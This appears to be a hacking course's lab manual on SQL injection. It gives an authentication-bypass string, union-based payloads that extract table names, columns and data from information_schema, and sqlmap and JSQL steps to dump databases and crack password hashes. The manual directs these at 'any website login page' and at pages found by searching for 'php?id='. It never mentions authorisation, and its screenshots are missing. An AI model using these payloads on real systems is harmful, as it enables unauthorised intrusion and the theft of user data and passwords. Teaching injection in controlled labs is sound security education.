SQL Injection

Lab Manual

Hacking with

THE DOCUMENT INCLUDES ADDITIONAL

PRACTICALS WHICH MAY OR MAY NOT BE COVERED
IN THE COURSE
 INDEX
S. No. Practical Name Page No.
1 SQL Injection Authentication Bypass Method 1
2 Error-based SQL Injection 2
3 Performing SQL Injection with SQL map tool 7
4 Performing SQL Injection with JSQL tool 10
 Practical 1: SQL Injection Authentication Bypass Method
Consider any website login page. Enter this string 1’ or ‘1’ = ‘1 in both username and password fields.
If the target web application is vulnerable to the SQL injection, we can gain access to the
administrator account.

Page | 1
 Practical 2: Error-based SQL Injection
We can search for web pages vulnerable to SQL injection using following search query
php?id=

Enter single quote (') at the end of URL to test SQL injection vulnerability in the webpage.

+++++++++
If it displays an error related to SQL in the webpage, it is vulnerable to SQL injection.
Append order by 1-- in the URL.

Increase the number by 1 every time until webpage loads normally without any error.
We can even try the following technique to identify a number of columns.
php?id=6’ order by 3--+

Page | 2
In this case, the website displays error until order by 7-- this indicates there are 6 columns in the
database. Now let us identify vulnerable columns by appending below query to the URL.
union select (list of columns)--
Example: union select 1,2,3,4,5,6--

In this case, we tried the following technique to identify vulnerable columns.

Example: php?id=-6 union select 1,2,3,4,5,6--

Page | 3
From the above result. It is observed that 3rd and 4th columns are vulnerable. To know the version of
database server, replace column number with version () as shown in the below image.

To retrieve database information including table names.

php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables
where table_schema=database()--

Page | 4
To extract the column names
php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns
where table_name=table name

The above technique fails to retrieve excepted information. So, let us try to encode the column name
php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns
where table_name=CHAR(97, 100, 109, 105, 110)--

Page | 5
To retrieve the data from the columns.
php?id=-1 union select 1,2,group_concat(column name),4,5,6,7 from (table_name)--

Page | 6
 Practical 3: Performing SQL Injection with SQL map tool.
Open terminal and execute the following command.
sqlmap –u <URL of the vulnerable website> --dbs

It will check for the SQL vulnerability. If it is vulnerable, it will identify target SQL server database
information.

To retrieve the table names from database, execute below command

sqlmap –u <URL of the vulnerable website> -D <database> --tables

Next, to extract columns from the tables, execute following command

Page | 7
sqlmap –u <URL of the vulnerable website> -D <database> -T <table name> --columns

To extract the content from the selected columns in tables

sqlmap –u <URL of the vulnerable website> -D <database> -T <table name> -C <columnnames> --
dump

Tool will try to perform Dictionary-based attack on stored hashes to identify plain text password.

Page | 8
Page | 9
 Practical 4: Performing SQL Injection with JSQL tool.
Select JSQL tool from the applications menu. JSQL will automate the process of identifying SQL
injection vulnerability on a website. Provide URL of a website vulnerable to SQL injection to start the
process of identifying database information.

After completing the extraction of data, select a table to extract contents as shown in the below
image.

Page | 10
We can use the inbuilt Brute force tool to decrypt the encrypted passwords.

Page | 11
Page | 12